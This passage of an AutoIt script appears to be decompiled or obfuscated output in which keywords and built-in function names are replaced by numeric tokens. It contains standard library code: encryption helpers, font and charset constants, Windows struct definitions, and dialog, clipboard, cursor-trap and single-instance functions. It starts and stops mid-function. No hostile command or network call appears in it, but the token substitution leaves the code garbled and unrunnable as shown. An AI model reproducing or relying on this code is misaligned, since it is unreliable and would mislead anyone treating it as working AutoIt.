| 4@error5 | |
| $ierror = @error + 400 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 182 | |
| 6 | |
| $dtempdata = _crypt_decryptdata($dtempdata, $vcryptkey, $calg_userkey, 40) | |
| 4@error5 | |
| $ierror = @error + 500 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 182 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 8 | |
| 1240 | |
| 1239 | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 4$hinfile <> -1590($hinfile) | |
| 4$houtfile <> -1590($houtfile) | |
| 34287($ierror, $iextended, $breturn) | |
| 33 | |
| 32_crypt_genrandom($pbuffer, $isize) | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, 40) | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptGenRandom", "handle", __crypt_context(), "dword", $isize, "struct*", $pbuffer) | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| _crypt_shutdown() | |
| 4$ierror2(3$aret[0])5 | |
| 34287($ierror + 10, $iextended, 40) | |
| 6 | |
| 3439 | |
| 8 | |
| 33 | |
| 32__crypt_refcount() | |
| 34$__g_acryptinternaldata[0] | |
| 33 | |
| 32__crypt_refcountinc() | |
| $__g_acryptinternaldata[0] += 1 | |
| 33 | |
| 32__crypt_refcountdec() | |
| 4$__g_acryptinternaldata[0] > 05$__g_acryptinternaldata[0] -= 1 | |
| 33 | |
| 32__crypt_dllhandle() | |
| 34$__g_acryptinternaldata[1] | |
| 33 | |
| 32__crypt_dllhandleset($hadvapi32) | |
| $__g_acryptinternaldata[1] = $hadvapi32 | |
| 33 | |
| 32__crypt_context() | |
| 34$__g_acryptinternaldata[2] | |
| 33 | |
| 32__crypt_contextset($hcryptcontext) | |
| $__g_acryptinternaldata[2] = $hcryptcontext | |
| 33 | |
| 32__crypt_getcalgfromcryptkey($vcryptkey) | |
| 28$talgid = 65("uint") | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptGetKeyParam", "handle", $vcryptkey, "dword", $kp_algid, "struct*", $talgid, "dword*", 68($talgid), "dword", 0) | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| 4$ierror23$aret[0]5 | |
| 34287($ierror + 80, $iextended, $crypt_userdata) | |
| 6 | |
| 3466($talgid, 1) | |
| 8 | |
| 33 | |
| 2930$fw_dontcare = 0 | |
| 2930$fw_thin = 100 | |
| 2930$fw_extralight = 200 | |
| 2930$fw_ultralight = 200 | |
| 2930$fw_light = 300 | |
| 2930$fw_normal = 400 | |
| 2930$fw_regular = 400 | |
| 2930$fw_medium = 500 | |
| 2930$fw_semibold = 600 | |
| 2930$fw_demibold = 600 | |
| 2930$fw_bold = 700 | |
| 2930$fw_extrabold = 800 | |
| 2930$fw_ultrabold = 800 | |
| 2930$fw_heavy = 900 | |
| 2930$fw_black = 900 | |
| 2930$cf_effects = 256 | |
| 2930$cf_printerfonts = 2 | |
| 2930$cf_screenfonts = 1 | |
| 2930$cf_noscriptsel = 8388608 | |
| 2930$cf_inittologfontstruct = 64 | |
| 2930$logpixelsx = 88 | |
| 2930$logpixelsy = 90 | |
| 2930$ansi_charset = 0 | |
| 2930$arabic_charset = 178 | |
| 2930$baltic_charset = 186 | |
| 2930$chinesebig5_charset = 136 | |
| 2930$default_charset = 1 | |
| 2930$easteurope_charset = 238 | |
| 2930$gb2312_charset = 134 | |
| 2930$greek_charset = 161 | |
| 2930$hangeul_charset = 129 | |
| 2930$hebrew_charset = 177 | |
| 2930$johab_charset = 130 | |
| 2930$mac_charset = 77 | |
| 2930$oem_charset = 255 | |
| 2930$russian_charset = 204 | |
| 2930$shiftjis_charset = 128 | |
| 2930$symbol_charset = 2 | |
| 2930$thai_charset = 222 | |
| 2930$turkish_charset = 162 | |
| 2930$vietnamese_charset = 163 | |
| 2930$out_character_precis = 2 | |
| 2930$out_default_precis = 0 | |
| 2930$out_device_precis = 5 | |
| 2930$out_outline_precis = 8 | |
| 2930$out_ps_only_precis = 10 | |
| 2930$out_raster_precis = 6 | |
| 2930$out_string_precis = 1 | |
| 2930$out_stroke_precis = 3 | |
| 2930$out_tt_only_precis = 7 | |
| 2930$out_tt_precis = 4 | |
| 2930$clip_character_precis = 1 | |
| 2930$clip_default_precis = 0 | |
| 2930$clip_dfa_disable = 48 | |
| 2930$clip_embedded = 128 | |
| 2930$clip_lh_angles = 16 | |
| 2930$clip_mask = 15 | |
| 2930$clip_dfa_override = 64 | |
| 2930$clip_stroke_precis = 2 | |
| 2930$clip_tt_always = 32 | |
| 2930$antialiased_quality = 4 | |
| 2930$default_quality = 0 | |
| 2930$draft_quality = 1 | |
| 2930$nonantialiased_quality = 3 | |
| 2930$proof_quality = 2 | |
| 2930$cleartype_quality = 5 | |
| 2930$default_pitch = 0 | |
| 2930$fixed_pitch = 1 | |
| 2930$variable_pitch = 2 | |
| 2930$ff_decorative = 80 | |
| 2930$ff_dontcare = 0 | |
| 2930$ff_modern = 48 | |
| 2930$ff_roman = 16 | |
| 2930$ff_script = 64 | |
| 2930$ff_swiss = 32 | |
| 2930$fs_regular = 0 | |
| 2930$fs_bold = 1 | |
| 2930$fs_italic = 2 | |
| 2930$tagpoint = "struct;long X;long Y;endstruct" | |
| 2930$tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct" | |
| 2930$tagsize = "struct;long X;long Y;endstruct" | |
| 2930$tagmargins = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight" | |
| 2930$tagfiletime = "struct;dword Lo;dword Hi;endstruct" | |
| 2930$tagsystemtime = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" | |
| 2930$tagtime_zone_information = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct" | |
| 2930$tagnmhdr = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" | |
| 2930$tagcomboboxexitem = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" | |
| 2930$tagnmcbedragbegin = $tagnmhdr & ";int ItemID;wchar szText[260]" | |
| 2930$tagnmcbeendedit = $tagnmhdr & ";bool fChanged;int NewSelection;wchar szText[260];int Why" | |
| 2930$tagnmcomboboxex = $tagnmhdr & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" | |
| 2930$tagdtprange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" | |
| 2930$tagnmdatetimechange = $tagnmhdr & ";dword Flag;" & $tagsystemtime | |
| 2930$tagnmdatetimeformat = $tagnmhdr & ";ptr Format;" & $tagsystemtime & ";ptr pDisplay;wchar Display[64]" | |
| 2930$tagnmdatetimeformatquery = $tagnmhdr & ";ptr Format;struct;long SizeX;long SizeY;endstruct" | |
| 2930$tagnmdatetimekeydown = $tagnmhdr & ";int VirtKey;ptr Format;" & $tagsystemtime | |
| 2930$tagnmdatetimestring = $tagnmhdr & ";ptr UserString;" & $tagsystemtime & ";dword Flags" | |
| 2930$tageventlogrecord = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" | |
| 2930$taggdip_effectparams_blur = "float Radius; bool ExpandEdge" | |
| 2930$taggdip_effectparams_brightnesscontrast = "int BrightnessLevel; int ContrastLevel" | |
| 2930$taggdip_effectparams_colorbalance = "int CyanRed; int MagentaGreen; int YellowBlue" | |
| 2930$taggdip_effectparams_colorcurve = "int Adjustment; int Channel; int AdjustValue" | |
| 2930$taggdip_effectparams_colorlut = "byte LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]" | |
| 2930$taggdip_effectparams_huesaturationlightness = "int HueLevel; int SaturationLevel; int LightnessLevel" | |
| 2930$taggdip_effectparams_levels = "int Highlight; int Midtone; int Shadow" | |
| 2930$taggdip_effectparams_redeyecorrection = "uint NumberOfAreas; ptr Areas" | |
| 2930$taggdip_effectparams_sharpen = "float Radius; float Amount" | |
| 2930$taggdip_effectparams_tint = "int Hue; int Amount" | |
| 2930$taggdipbitmapdata = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved" | |
| 2930$taggdipcolormatrix = "float m[25]" | |
| 2930$taggdipencoderparam = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct" | |
| 2930$taggdipencoderparams = "uint Count;" & $taggdipencoderparam | |
| 2930$taggdiprectf = "struct;float X;float Y;float Width;float Height;endstruct" | |
| 2930$taggdipstartupinput = "uint Version;ptr Callback;bool NoThread;bool NoCodecs" | |
| 2930$taggdipstartupoutput = "ptr HookProc;ptr UnhookProc" | |
| 2930$taggdipimagecodecinfo = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" | |
| 2930$taggdippencoderparams = "uint Count;byte Params[1]" | |
| 2930$taghditem = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State" | |
| 2930$tagnmhddispinfo = $tagnmhdr & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam" | |
| 2930$tagnmhdfilterbtnclick = $tagnmhdr & ";int Item;" & $tagrect | |
| 2930$tagnmheader = $tagnmhdr & ";int Item;int Button;ptr pItem" | |
| 2930$taggetipaddress = "byte Field4;byte Field3;byte Field2;byte Field1" | |
| 2930$tagnmipaddress = $tagnmhdr & ";int Field;int Value" | |
| 2930$taglvfindinfo = "struct;uint Flags;ptr Text;lparam Param;" & $tagpoint & ";uint Direction;endstruct" | |
| 2930$taglvhittestinfo = $tagpoint & ";uint Flags;int Item;int SubItem;int iGroup" | |
| 2930$taglvitem = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" | |
| 2930$tagnmlistview = $tagnmhdr & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" | |
| 2930$tagnmlvcustomdraw = "struct;" & $tagnmhdr & ";dword dwDrawStage;handle hdc;" & $tagrect & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" | |
| 2930$tagnmlvdispinfo = $tagnmhdr & ";" & $taglvitem | |
| 2930$tagnmlvfinditem = $tagnmhdr & ";int Start;" & $taglvfindinfo | |
| 2930$tagnmlvgetinfotip = $tagnmhdr & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam" | |
| 2930$tagnmitemactivate = $tagnmhdr & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $tagpoint & ";lparam lParam;uint KeyFlags" | |
| 2930$tagnmlvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagnmlvscroll = $tagnmhdr & ";int DX;int DY" | |
| 2930$tagmchittestinfo = "uint Size;" & $tagpoint & ";uint Hit;" & $tagsystemtime & ";" & $tagrect & ";int iOffset;int iRow;int iCol" | |
| 2930$tagmcmonthrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" | |
| 2930$tagmcrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" | |
| 2930$tagmcselrange = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" | |
| 2930$tagnmdaystate = $tagnmhdr & ";" & $tagsystemtime & ";int DayState;ptr pDayState" | |
| 2930$tagnmselchange = $tagnmhdr & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" | |
| 2930$tagnmobjectnotify = $tagnmhdr & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags" | |
| 2930$tagnmtckeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagtvitem = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" | |
| 2930$tagtvitemex = "struct;" & $tagtvitem & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct" | |
| 2930$tagnmtreeview = $tagnmhdr & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" | |
| 2930$tagnmtvcustomdraw = "struct;" & $tagnmhdr & ";dword DrawStage;handle HDC;" & $tagrect & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level" | |
| 2930$tagnmtvdispinfo = $tagnmhdr & ";" & $tagtvitem | |
| 2930$tagnmtvgetinfotip = $tagnmhdr & ";ptr Text;int TextMax;handle hItem;lparam lParam" | |
| 2930$tagnmtvitemchange = $tagnmhdr & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;" | |
| 2930$tagtvhittestinfo = $tagpoint & ";uint Flags;handle Item" | |
| 2930$tagnmtvkeydown = "align 1;" & $tagnmhdr & ";word VKey;uint Flags" | |
| 2930$tagnmmouse = $tagnmhdr & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $tagpoint & ";lparam HitInfo" | |
| 2930$tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes" | |
| 2930$tagimageinfo = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $tagrect | |
| 2930$tagmenuinfo = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData" | |
| 2930$tagmenuiteminfo = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" | |
| 2930$tagrebarbandinfo = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVersion = "WIN_XP") ? "" : ";" & $tagrect & ";uint uChevronState") | |
| 2930$tagnmrebarautobreak = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak" | |
| 2930$tagnmrbautosize = $tagnmhdr & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" | |
| 2930$tagnmrebar = $tagnmhdr & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam" | |
| 2930$tagnmrebarchevron = $tagnmhdr & ";uint uBand;uint wID;lparam lParam;" & $tagrect & ";lparam lParamNM" | |
| 2930$tagnmrebarchildsize = $tagnmhdr & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" | |
| 2930$tagcolorscheme = "dword Size;dword BtnHighlight;dword BtnShadow" | |
| 2930$tagnmtoolbar = $tagnmhdr & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $tagrect | |
| 2930$tagnmtbhotitem = $tagnmhdr & ";int idOld;int idNew;dword dwFlags" | |
| 2930$tagtbbutton = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String" | |
| 2930$tagtbbuttoninfo = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax" | |
| 2930$tagnetresource = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" | |
| 2930$tagoverlapped = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent" | |
| 2930$tagopenfilename = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" | |
| 2930$tagbitmapinfoheader = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct" | |
| 2930$tagbitmapinfo = $tagbitmapinfoheader & ";dword biRGBQuad[1]" | |
| 2930$tagblendfunction = "byte Op;byte Flags;byte Alpha;byte Format" | |
| 2930$tagguid = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" | |
| 2930$tagwindowplacement = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]" | |
| 2930$tagwindowpos = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags" | |
| 2930$tagscrollinfo = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos" | |
| 2930$tagscrollbarinfo = "dword cbSize;" & $tagrect & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" | |
| 2930$taglogfont = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct" | |
| 2930$tagkbdllhookstruct = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo" | |
| 2930$tagprocess_information = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID" | |
| 2930$tagstartupinfo = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" | |
| 2930$tagsecurity_attributes = "dword Length;ptr Descriptor;bool InheritHandle" | |
| 2930$tagwin32_find_data = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]" | |
| 2930$tagtextmetric = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" | |
| 2930$__miscconstant_cc_anycolor = 256 | |
| 2930$__miscconstant_cc_fullopen = 2 | |
| 2930$__miscconstant_cc_rgbinit = 1 | |
| 2930$tagchoosecolor = "dword Size;hwnd hWndOwnder;handle hInstance;dword rgbResult;ptr CustColors;dword Flags;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName" | |
| 2930$tagchoosefont = "dword Size;hwnd hWndOwner;handle hDC;ptr LogFont;int PointSize;dword Flags;dword rgbColors;lparam CustData;" & "ptr fnHook;ptr TemplateName;handle hInstance;ptr szStyle;word FontType;int SizeMin;int SizeMax" | |
| 32_choosecolor($ireturntype = 0, $icolorref = 0, $ireftype = 0, $hwndownder = 0) | |
| 28$tagcustcolors = "dword[16]" | |
| 28$tchoose = 65($tagchoosecolor) | |
| 28$tcc = 65($tagcustcolors) | |
| 4$ireftype = 15 | |
| $icolorref = 217($icolorref) | |
| 7$ireftype = 25 | |
| $icolorref = 199(306($icolorref), 6) | |
| $icolorref = "0x" & 325($icolorref, 5, 2) & 325($icolorref, 3, 2) & 325($icolorref, 1, 2) | |
| 8 | |
| 69($tchoose, "Size", 68($tchoose)) | |
| 69($tchoose, "hWndOwnder", $hwndownder) | |
| 69($tchoose, "rgbResult", $icolorref) | |
| 69($tchoose, "CustColors", 67($tcc)) | |
| 69($tchoose, "Flags", 19($__miscconstant_cc_anycolor, $__miscconstant_cc_fullopen, $__miscconstant_cc_rgbinit)) | |
| 28$aresult = 58("comdlg32.dll", "bool", "ChooseColor", "struct*", $tchoose) | |
| 4@error534287(@error, @extended, -1) | |
| 4$aresult[0] = 0534287(-3, -3, -1) | |
| 28$scolor_picked = 66($tchoose, "rgbResult") | |
| 4$ireturntype = 15 | |
| 34"0x" & 199(306($scolor_picked), 6) | |
| 7$ireturntype = 25 | |
| $scolor_picked = 199(306($scolor_picked), 6) | |
| 34"0x" & 325($scolor_picked, 5, 2) & 325($scolor_picked, 3, 2) & 325($scolor_picked, 1, 2) | |
| 7$ireturntype = 05 | |
| 34$scolor_picked | |
| 6 | |
| 34287(-4, -4, -1) | |
| 8 | |
| 33 | |
| 32_choosefont($sfontname = "Courier New", $ipointsize = 10, $ifontcolorref = 0, $ifontweight = 0, $bitalic = 40, $bunderline = 40, $bstrikethru = 40, $hwndowner = 0) | |
| 28$iitalic = 0, $iunderline = 0, $istrikeout = 0 | |
| $ifontcolorref = 19(21(17($ifontcolorref, 255), -16), 17($ifontcolorref, 65280), 21(17($ifontcolorref, 16711680), 16)) | |
| 28$hdc = __misc_getdc(0) | |
| 28$iheight = 280(($ipointsize * __misc_getdevicecaps($hdc, $logpixelsx)) / 72, 0) | |
| __misc_releasedc(0, $hdc) | |
| 28$tchoosefont = 65($tagchoosefont) | |
| 28$tlogfont = 65($taglogfont) | |
| 69($tchoosefont, "Size", 68($tchoosefont)) | |
| 69($tchoosefont, "hWndOwner", $hwndowner) | |
| 69($tchoosefont, "LogFont", 67($tlogfont)) | |
| 69($tchoosefont, "PointSize", $ipointsize) | |
| 69($tchoosefont, "Flags", 19($cf_screenfonts, $cf_printerfonts, $cf_effects, $cf_inittologfontstruct, $cf_noscriptsel)) | |
| 69($tchoosefont, "rgbColors", $ifontcolorref) | |
| 69($tchoosefont, "FontType", 0) | |
| 69($tlogfont, "Height", $iheight) | |
| 69($tlogfont, "Weight", $ifontweight) | |
| 69($tlogfont, "Italic", $bitalic) | |
| 69($tlogfont, "Underline", $bunderline) | |
| 69($tlogfont, "Strikeout", $bstrikethru) | |
| 69($tlogfont, "FaceName", $sfontname) | |
| 28$aresult = 58("comdlg32.dll", "bool", "ChooseFontW", "struct*", $tchoosefont) | |
| 4@error534287(@error, @extended, -1) | |
| 4$aresult[0] = 0534287(-3, -3, -1) | |
| 28$sfacename = 66($tlogfont, "FaceName") | |
| 4323($sfacename) = 01323($sfontname) > 05$sfacename = $sfontname | |
| 466($tlogfont, "Italic")5$iitalic = 2 | |
| 466($tlogfont, "Underline")5$iunderline = 4 | |
| 466($tlogfont, "Strikeout")5$istrikeout = 8 | |
| 28$iattributes = 19($iitalic, $iunderline, $istrikeout) | |
| 28$isize = 66($tchoosefont, "PointSize") / 10 | |
| 28$icolorref = 66($tchoosefont, "rgbColors") | |
| 28$iweight = 66($tlogfont, "Weight") | |
| 28$scolor_picked = 199(306($icolorref), 6) | |
| 34331($iattributes & "," & $sfacename & "," & $isize & "," & $iweight & "," & $icolorref & "," & "0x" & $scolor_picked & "," & "0x" & 325($scolor_picked, 5, 2) & 325($scolor_picked, 3, 2) & 325($scolor_picked, 1, 2), ",") | |
| 33 | |
| 32_clipputfile($sfilepath, $sdelimiter = "|") | |
| 2830$gmem_moveable = 2, $cf_hdrop = 15 | |
| $sfilepath &= $sdelimiter & $sdelimiter | |
| 28$nglobmemsize = 2 * (323($sfilepath) + 20) | |
| 28$aresult = 58("user32.dll", "bool", "OpenClipboard", "hwnd", 0) | |
| 4@error2$aresult[0] = 0534287(1, _winapi_getlasterror(), 40) | |
| 28$ierror = 0, $ilasterror = 0 | |
| $aresult = 58("user32.dll", "bool", "EmptyClipboard") | |
| 4@error23$aresult[0]5 | |
| $ierror = 2 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| $aresult = 58("kernel32.dll", "handle", "GlobalAlloc", "uint", $gmem_moveable, "ulong_ptr", $nglobmemsize) | |
| 4@error23$aresult[0]5 | |
| $ierror = 3 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| 28$hglobal = $aresult[0] | |
| $aresult = 58("kernel32.dll", "ptr", "GlobalLock", "handle", $hglobal) | |
| 4@error23$aresult[0]5 | |
| $ierror = 4 | |
| $ilasterror = _winapi_getlasterror() | |
| 6 | |
| 28$hlock = $aresult[0] | |
| 28$tdropfiles = 65("dword pFiles;" & $tagpoint & ";bool fNC;bool fWide;wchar[" & 323($sfilepath) + 1 & "]", $hlock) | |
| 4@error534287(5, 6, 40) | |
| 28$tstruct = 65("dword;long;long;bool;bool") | |
| 69($tdropfiles, "pFiles", 68($tstruct)) | |
| 69($tdropfiles, "X", 0) | |
| 69($tdropfiles, "Y", 0) | |
| 69($tdropfiles, "fNC", 0) | |
| 69($tdropfiles, "fWide", 1) | |
| 69($tdropfiles, 6, $sfilepath) | |
| 13$i = 115323($sfilepath) | |
| 466($tdropfiles, 6, $i) = $sdelimiter569($tdropfiles, 6, 28(0), $i) | |
| 14 | |
| $aresult = 58("user32.dll", "handle", "SetClipboardData", "uint", $cf_hdrop, "handle", $hglobal) | |
| 4@error23$aresult[0]5 | |
| $ierror = 6 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| $aresult = 58("kernel32.dll", "bool", "GlobalUnlock", "handle", $hglobal) | |
| 4(@error23$aresult[0])13$ierror1_winapi_getlasterror()5 | |
| $ierror = 8 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| 8 | |
| $aresult = 58("kernel32.dll", "ptr", "GlobalFree", "handle", $hglobal) | |
| 4(@error2$aresult[0])13$ierror5 | |
| $ierror = 9 | |
| $ilasterror = _winapi_getlasterror() | |
| 8 | |
| 8 | |
| 8 | |
| $aresult = 58("user32.dll", "bool", "CloseClipboard") | |
| 4(@error23$aresult[0])13$ierror534287(7, _winapi_getlasterror(), 40) | |
| 4$ierror534287($ierror, $ilasterror, 40) | |
| 3439 | |
| 33 | |
| 32_mousetrap($ileft = 0, $itop = 0, $iright = 0, $ibottom = 0) | |
| 28$areturn = 0 | |
| 4$ileft = 415$ileft = 0 | |
| 4$itop = 415$itop = 0 | |
| 4$iright = 415$iright = 0 | |
| 4$ibottom = 415$ibottom = 0 | |
| 4@NumParams = 05 | |
| $areturn = 58("user32.dll", "bool", "ClipCursor", "ptr", 0) | |
| 4@error23$areturn[0]534287(1, _winapi_getlasterror(), 40) | |
| 6 | |
| 4@NumParams = 25 | |
| $iright = $ileft + 1 | |
| $ibottom = $itop + 1 | |
| 8 | |
| 28$trect = 65($tagrect) | |
| 69($trect, "Left", $ileft) | |
| 69($trect, "Top", $itop) | |
| 69($trect, "Right", $iright) | |
| 69($trect, "Bottom", $ibottom) | |
| $areturn = 58("user32.dll", "bool", "ClipCursor", "struct*", $trect) | |
| 4@error23$areturn[0]534287(2, _winapi_getlasterror(), 40) | |
| 8 | |
| 3439 | |
| 33 | |
| 32_singleton($soccurrencename, $iflag = 0) | |
| 2830$error_already_exists = 183 | |
| 2830$security_descriptor_revision = 1 | |
| 28$tsecurityattributes = 0 | |
| 417($iflag, 2)5 | |
| 28$tsecuritydescriptor = 65("byte;byte;word;ptr[4]") | |
